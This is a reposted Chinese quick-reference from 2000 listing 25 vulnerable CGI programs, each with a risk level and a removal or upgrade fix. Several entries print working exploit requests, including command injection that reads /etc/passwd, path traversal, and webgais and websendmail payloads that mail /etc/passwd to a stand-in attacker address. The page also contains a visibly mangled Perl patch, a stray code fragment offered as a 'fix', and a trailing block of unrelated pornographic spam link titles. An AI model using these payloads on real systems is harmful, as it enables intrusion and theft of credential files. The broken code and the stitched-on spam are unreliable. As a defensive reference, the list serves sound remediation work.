• <label id="pxtpz"><meter id="pxtpz"></meter></label>
      1. <span id="pxtpz"><optgroup id="pxtpz"></optgroup></span>

        當前位置:雨林木風下載站 > 技術(shù)開發(fā)教程 > 詳細頁面

        CGI安全漏洞資料速查 v1.0(轉(zhuǎn)一)

        CGI安全漏洞資料速查 v1.0(轉(zhuǎn)一)

        更新時間:2022-05-01 文章作者:未知 信息來源:網(wǎng)絡 閱讀次數(shù):

        ◆ CGI安全漏洞資料速查 v1.0

        日期:2000-8-15

        #############################################################################
        本文取自一位朋友.這本來不算是什么珍貴的東西,如果你平時注意收集的話,相信很多人都會
        有比這份更全面、更好的資料.但由于某些原因.這些資料一直都不肯被公開.但我是一個崇尚完
        全自由、完全開放、完全共享的little guys.所以我把這份資料公開了.希望那位朋友不要怪罪 :) 
        # 如有任何安全組織或個人愿意無嘗對此文進行長期的、不間斷地維護、更新或更改. 請自行
        隨便,不必與我商討.但要求是成果必須完全地向internet公開. 任何行為的私藏都是不受歡
        迎的.
        # 本文歡迎轉(zhuǎn)摘.但請保持這些聲明。
        # 如有任何問題或建議,請mailto: iwillsurewin@163.net
        # iwillsurewin 2000.7.28
        ############################################################################

                 
        1
        類型: 攻擊型
        名字: phf
        風險等級: 中
        描述: 在NCSA 或者 Apache (1.1.1版本以內(nèi))非商業(yè)版本的Web Server中有一段程序util.c,允許黑客以root身份執(zhí)行任何一個指令:
        http://www.xxx.com/cgi-bin/phf?Qname=root%0Asome%20command%20here
        建議: 
        解決方法: 把Apache web server升級到1.1.1以上,或者將NCSA web server升級到最新版本

        _________________________________________________________________

        2
        類型: 攻擊型
        名字: wguset.exe
        風險等級: 中
        描述: 如果您使用NT做為您的WebServer的操作系統(tǒng),而且wguest.exe存在于您的Web可執(zhí)行目錄中的話,入侵者將能利用它閱讀到您的硬盤上所有USR_<hostname>用戶能閱讀的文件
        建議: 將wguset.exe從你的Web目錄移走或刪除
        解決方法: 將wguset.exe從你的Web目錄移走或刪除

        ___________________________________________________________________


        3
        類型: 攻擊型
        名字: rguset.exe
        風險等級: 中
        描述: 如果您使用NT做為您的WebServer的操作系統(tǒng),而且rguest.exe存在于您的Web可執(zhí)行目錄中的話,入侵者將能利用它閱讀到您的硬盤上所有USR_<hostname>用戶能閱讀的文件
        建議: 將rguset.exe從你的Web目錄移走或刪除
        解決方法: 將rguset.exe從你的Web目錄移走或刪除


        _______________________________________________________________________

        4
        類型: 攻擊型
        名字: perl.exe
        風險等級: 低
        描述: 在cgi-bin執(zhí)行目錄下存在perl.exe,這屬于嚴重的配置錯誤。黑客可以在perl.exe后面加一串指令,利用瀏覽器在server上執(zhí)行任何腳本程序
        建議: perl.exe是放在任何帶執(zhí)行權(quán)限的web目錄下都是不安全的
        解決方法: 在web目錄下移除perl.exe這個程序.


        ____________________________________________________________________


        5
        類型: 攻擊型
        名字: shtml.exe
        風險等級: 低
        描述: 如果您使用Front Page作為您的WebServer,那么入侵者能夠利用IUSR_<lt;hostname>用戶和shtml.exe入侵您的機器,做您不希望的事
        建議: 將shtml.exe從你的Web目錄移走或刪除
        解決方法: 將shtml.exe從你的Web目錄移走或刪除


        ___________________________________________________________________


        6
        類型: 攻擊型
        名字: wwwboard.pl
        風險等級: 低
        描述: wwwboard.pl程序容易引起攻擊者對服務器進行D.O.S攻擊
        建議: 如無必要可以刪除該文件
        解決方法: 對get_variables的子程序中的下面這段:
        if ($FORM{'followup'}) { $followup = "1";
        @followup_num = split(/,/,$FORM{'followup'});
        $num_followups = @followups = @followup_num;
        $last_message = pop(@followups);
        $origdate = "$FORM{'origdate'}";
        $origname = "$FORM{'origname'}";
        $origsubject = "$FORM{'origsubject'}"; }
        替換為:
        if ($FORM{'followup'}) {
        $followup = "1";
        @followup_num = split(/,/,$FORM{'followup'});
        $num_followups = @followups = @followup_num;
        $last_message = pop(@followups);
        $origdate = "$FORM{'origdate'}";
        $origname = "$FORM{'origname'}";
        $origsubject = "$FORM{'origsubject'}";
        # WWWBoard Bomb Patch
        # Written By: Samuel Sparling sparling@slip.net)
        $fn=0;
        while($fn < $num_followups)
        {
        $cur_fup = @followups $fn];
        $dfn=0;
        foreach $fm(@followups)
        {
        if(@followups[$dfn] == @followups[$fn] && $dfn != $fn)
        {
        &error(board_bomb);
        }
        $dfn++;
        }
        $fn++;
        }
        # End WWWBoard Bomb Patch
        }

        相關(guān)連接: http://hgfr

        _________________________________________________________________________

        7
        類型: 攻擊型
        名字: uploader.exe
        風險等級: 中
        描述: 如果您使用NT作為您的WebServer的操作系統(tǒng),入侵者能夠利用uploader.exe上傳任何文件
        建議: 將uploader.exe從你的Web目錄移走或刪除
        解決方法: 將uploader.exe從你的Web目錄移走或刪除

        ________________________________________________________________

        8
        類型: 攻擊型
        名字: bdir.htr
        風險等級: 高
        描述: 如果您使用NT做為您的WebServer的操作系統(tǒng),而且bdir.htr存在于您的Web可執(zhí)行目錄中的話,入侵者將能利用它在您的服務器上無止境的創(chuàng)建ODBC數(shù)據(jù)庫,并生成一些可執(zhí)行的文件。
        建議: 將bdir.htr從你的Web目錄移走或刪除
        解決方法: 將bdir.htr從你的Web目錄移走或刪除

        __________________________________________________________________

        9
        類型: 攻擊型
        名字: Count.cgi
        風險等級: 高
        描述: 在/cgi-bin目錄下的Count.cgi程序(wwwcount2.3版本)有一個溢出錯誤,允許入侵者無須登錄而遠程執(zhí)行任何指令.
        建議: 如無必要可以刪除該文件
        解決方法: 將wwwcount升級到2.4或者以上

        _________________________________________________________________

        10
        類型: 攻擊型
        名字: test-cgi
        風險等級: 高
        描述: test-cgi這個文件可以被入侵者用來瀏覽服務器上的重要信息

        建議: 建議審核cgi-bin目錄下的執(zhí)行程序,嚴格控制訪問權(quán)限
        解決方法: 刪除test-cgi文件

        __________________________________________________________________

        11
        類型: 攻擊型
        名字: nph-test-cgi
        風險等級: 高
        描述: nph-test-cgi這個文件可以被入侵者用來瀏覽服務器上的重要信息

        建議: 建議審核cgi-bin目錄下的執(zhí)行程序,嚴格控制訪問權(quán)限
        解決方法: 刪除nph-test-cgi文件

        __________________________________________________________________

        12
        類型: 攻擊型
        名字: php.cgi
        風險等級: 低
        描述: php.cgi程序有較多的漏洞,包括緩存溢出漏洞,還有導致任何系統(tǒng)文件可以被入侵者讀取的漏洞
        建議: 建議審核cgi-bin目錄,避免有不必要的程序存在
        解決方法: 刪除php.cgi程序是最好的辦法

        _________________________________________________________________

        13
        類型: 攻擊型
        名字: handler
        風險等級: 低
        描述: IRIX 5.3, 6.2, 6.3, 6.4的/cgi-bin/handler程序存在緩存溢出錯誤,允許入侵者在server上遠程執(zhí)行一段程序:
        telnet target.machine.com 80
        GET /cgi-bin/handler/whatever;cat /etc/passwd| ?data=Download
        HTTP/1.0
        建議: 建議審核cgi-bin目錄,避免有不必要的程序存在
        解決方法: 刪除handler文件

        ________________________________________________________________


        14
        類型: 攻擊型
        名字: webgais
        風險等級: 高
        描述: /cgi-bin,目錄下的webgais是GAIS搜索工具的一個接口,它有一個毛病使入侵者可以繞過程序的安全機制,執(zhí)行系統(tǒng)命令:
        POST /cgi-bin/webgais HTTP/1.0
        Content-length: 85 (replace this with the actual length of the "exploit" line)
        telnet target.machine.com 80

        query=';mail+you\@your.host</etc/passwd;echo'&output=subject&domain=paragraph
        建議: 建議審核cgi-bin目錄,避免有不必要的程序存在
        解決方法: 刪除webgais文件

        ________________________________________________________________

        15
        類型: 攻擊型
        名字: websendmail
        風險等級: 高
        描述: /cgin-bin目錄下的websendmail程序允許入侵者執(zhí)行一個系統(tǒng)指令:

        telnet target.machine.com 80
        POST /cgi-bin/websendmail HTTP/1.0
        Content-length: xxx (should be replaced with the actual length of the string passed to the server, in this case xxx=90)
        receiver=;mail+your_address\@somewhere.org</etc/passwd;&sender=a&rtnaddr=a&subject=a
        &content=a
        建議: 建議審核cgi-bin目錄,避免有不必要的程序存在
        解決方法: 高級用戶:編輯websendmail腳本,過濾特殊字符
        一般用戶:刪除websendmail文件

        ____________________________________________________________________

        16
        類型: 攻擊型
        名字: webdist.cgi
        風險等級: 高
        描述: 對于Irix6.2和6.3平臺,/cgi-bin目錄下的webdist.cgi有一個弱點允許入侵者無須登錄而在系統(tǒng)上執(zhí)行任何指令:
        http://host/cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd

        建議: 建議審核cgi-bin目錄,避免有不必要的程序存在
        解決方法: 刪除/var/www/cgi-bin/webdist.cgi目錄下的webdist.cgi

        __________________________________________________________________

        17
        類型: 攻擊型
        名字: faxsurvey
        風險等級: 高
        描述: 在Linux S.u.S.E上/cgi-bin目錄下的faxsurvey程序允許入侵者無須登錄就能在服務器執(zhí)行指令:
        http://joepc.linux.elsewhere.org/cgi-bin/faxsurvey?/bin/cat%20/etc/passwd
        建議: 建議審核cgi-bin目錄,避免有不必要的程序存在
        解決方法: 刪除/cgi-bin/faxsurvey文件


        _______________________________________________________________________


        18
        類型: 攻擊型
        名字: htmlscript
        風險等級: 中
        描述: 安裝了htmlscript2.99x或者更早版本的服務器,存在一個毛病使入侵者可以查看服務器上的任何文件:
        http://www.vulnerable.server.com/cgi-bin/htmlscript?../../../../etc/passwd
        建議: 建議審核cgi-bin目錄,避免有不必要的程序存在
        解決方法: 刪除/cgi-bin/htmlscript腳本文件,或者將htmlscript升級到3。0以上


        __________________________________________________________________________

        19
        類型: 攻擊型
        名字: pfdisplay
        風險等級: 中
        描述: 在Irix6.4或者更早版本的web服務器上,/cgi-bin/pfdisplay程序允許入侵者非法查看服務器上的文件
        建議: 建議審核cgi-bin目錄,避免有不必要的程序存在
        解決方法: 刪除/cgi-bin/pfdisplay文件,或者打補丁
        補丁可以去sgigate.sgi.com (204.94.209.1) 或者ftp.sgi.com下載:
        Filename: README.patch.3018
        Algorithm #1 (sum -r): 37955 11 README.patch.3018
        Algorithm #2 (sum): 15455 11 README.patch.3018
        MD5 checksum: 1169EB51D75E0794C64C2C1FD6211B69

        Filename: patchSG0003018
        Algorithm #1 (sum -r): 01679 2 patchSG0003018
        Algorithm #2 (sum): 12876 2 patchSG0003018
        MD5 checksum: BD16A53A0AE693D6E9E276EE066BDBC8

        Filename: patchSG0003018.idb
        Algorithm #1 (sum -r): 01339 2 patchSG0003018.idb
        Algorithm #2 (sum): 251 2 patchSG0003018.idb
        MD5 checksum: 1CB16E6A8C50BF17CD02A29C2E4D35EB

        Filename: patchSG0003018.performer_tools_man
        Algorithm #1 (sum -r): 10201 8 patchSG0003018.performer_tools_man
        Algorithm #2 (sum): 3144 8 patchSG0003018.performer_tools_man
        MD5 checksum: B6B3D90FAB9B5A342397C3E5AF5A8D29

        Filename: patchSG0003018.performer_tools_sw
        Algorithm #1 (sum -r): 48474 18 patchSG0003018.performer_tools_sw
        Algorithm #2 (sum): 28176 18 patchSG0003018.performer_tools_sw
        MD5 checksum: DF4E8ED8326A6A0B39F7B4D67E5FD71F
        相關(guān)連接: http://www.securityfocus.com/vdb/bottom.html?section=solution&vid=64


        _____________________________________________________________________


        20
        類型: 攻擊型
        名字: www-sql
        風險等級: 中
        描述: www-sql存在于/cgi-bin/目錄下,這將導致入侵可以越權(quán)訪問被保護的文件
        建議: 最好刪除www-sql文件
        解決方法: #if PHPFASTCGI
        while(FCGI_Accept() >= 0)
        {
        #endif
        s = getenv("REDIRECT_STATUS");
        if(!s) {
        puts("Content-type: text/plain\r\n\r\nPHP/FI detected an internal error. Please inform sa@hogia.net of what you just did.\n");
        exit(1);
        }
        s = getenv("PATH_TRANSLATED");
        相關(guān)連接:

        _________________________________________________________________________________


        21
        類型: 攻擊型
        名字: view-source
        風險等級: 高
        描述: 在cgi-bin目錄下的view-source程序沒有對輸入進行安全檢查,使入侵者可以查看服務器上的任何文件
        建議: 建議審核cgi-bin目錄,避免有不必要的程序存在
        解決方法: 刪除/cgi-bin目錄下的viewsource程序
        相關(guān)連接: http://www.securityfocus.com/vdb/bottom.html?section=solution&vid=64

        ______________________________________________________________________

        22
        類型: 攻擊型
        名字: campas
        風險等級: 高
        描述: 在cgi-bin目錄下的campas程序有一個毛病可以使入侵者隨意查看server上的重要文件:
        telnet www.xxxx.net 80
        Trying 200.xx.xx.xx...
        Connected to venus.xxxx.net
        Escape character is '^]'.
        GET /cgi-bin/campas?%0acat%0a/etc/passwd%0a
        建議: 建議審核cgi-bin目錄,避免有不必要的程序存在
        解決方法: 刪除/cgi-bin目錄下的campas程序
        相關(guān)連接: http://www.securityfocus.com/vdb/bottom.html?section=solution&vid=64


        ___________________________________________________________________________


        23
        類型: 攻擊型
        名字: aglimpse
        風險等級: 高
        描述: 在cgi-bin目錄下的aglimpse程序有一個毛病可以使入侵者無須登錄而隨意執(zhí)行任何指令 
        建議: 建議審核cgi-bin目錄,避免有不必要的程序存在
        解決方法: 刪除/cgi-bin目錄下的aglimpse程序
        相關(guān)連接: http://www.securityfocus.com/vdb/bottom.html?section=solution&vid=64


        ______________________________________________________________________________

        24
        類型: 攻擊型
        名字: AT-admin.cgi
        風險等級: 中
        描述: 在Excite for Web Servers 1.1上的/cgi-bin/AT-admin.cgi程序,允許普通用戶完全控制整個系統(tǒng)
        建議: 建議審核cgi-bin目錄,避免有不必要的程序存在
        解決方法: 刪除/cgi-bin目錄下的AT-admin.cgi程序
        相關(guān)連接: http://www.securityfocus.com/vdb/bottom.html?section=solution&vid=64


        ____________________________________________________________________________________

        25
        類型: 攻擊型
        名字: finger
        風險等級: 中
        描述: 這個位于/cgi-bin下的finger程序,可以查看其它服務器的信息,但是如果將參數(shù)改成本機,本機上的帳號信息將暴露無遺:
        /cgi-bin/finger?@localhost
        建議: 建議審核cgi-bin目錄,避免有不必要的程序存在
        解決方法: 刪除/cgi-bin目錄下的finger程序
        相關(guān)連接:


        ________________________________________________________________________

        溫馨提示:喜歡本站的話,請收藏一下本站!

        本類教程下載

        系統(tǒng)下載排行

        主站蜘蛛池模板: 亚洲一日韩欧美中文字幕在线| 国产高清对白在线观看免费91| 一级成人a做片免费| 国产免费牲交视频| 亚洲精品伦理熟女国产一区二区 | 久久久久久毛片免费看| 国产成人aaa在线视频免费观看| 国产亚洲精品影视在线| 天天摸天天操免费播放小视频| 亚洲日韩乱码中文字幕| 免费羞羞视频网站| 亚洲AV成人精品日韩一区| 国产大片91精品免费看3| 免费无码国产V片在线观看| 亚洲福利中文字幕在线网址| 免费无码午夜福利片69| 精品国产香蕉伊思人在线在线亚洲一区二区 | 亚洲中文字幕无码久久精品1| 久久国产精品免费一区二区三区| 在线A亚洲老鸭窝天堂| 亚欧免费一级毛片| 亚洲乱码一二三四区国产| 女人被免费视频网站| 免费一级全黄少妇性色生活片 | 在线看片免费不卡人成视频 | 两性色午夜视频免费播放| 亚洲AV本道一区二区三区四区| 67194国产精品免费观看| 午夜在线a亚洲v天堂网2019| 四虎影视精品永久免费| 中国黄色免费网站| 亚洲乱码无限2021芒果| 免费人成网站在线高清| 免费看一区二区三区四区| 亚洲av片不卡无码久久| 免费一级成人毛片| 国产成人精品免费久久久久| ASS亚洲熟妇毛茸茸PICS| 亚洲成片观看四虎永久| 最近中文字幕免费mv在线视频| 亚洲jizzjizz少妇|